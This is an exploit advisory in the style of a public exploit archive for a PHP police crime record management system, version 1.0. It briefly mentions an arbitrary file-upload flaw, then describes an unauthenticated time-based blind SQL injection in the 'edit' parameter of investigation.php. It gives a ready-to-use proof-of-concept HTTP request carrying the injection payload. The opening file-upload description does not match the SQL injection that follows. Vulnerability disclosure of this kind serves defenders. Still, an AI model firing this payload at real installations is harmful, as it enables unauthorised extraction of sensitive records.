# Exploit Author: ()t/\/\1
# Date: 23/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Tested on: Linux
# Version: 1.0
# Exploit Description:
The application is prone to an arbitrary file-upload because it
fails to adequately sanitize user-supplied input. An attacker can
exploit these issues to upload arbitrary files in the context of
the web server process and execute commands.
The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'edit' GET parameter in 'http://127.0.0.1//ghpolice/admin/investigation.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.
# PoC request
GET
/ghpolice/admin/investigation.php?edit=210728101'-IF(MID(user(),1,1)='r',SLEEP(2),0)--+-
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
Upgrade-Insecure-Requests: 1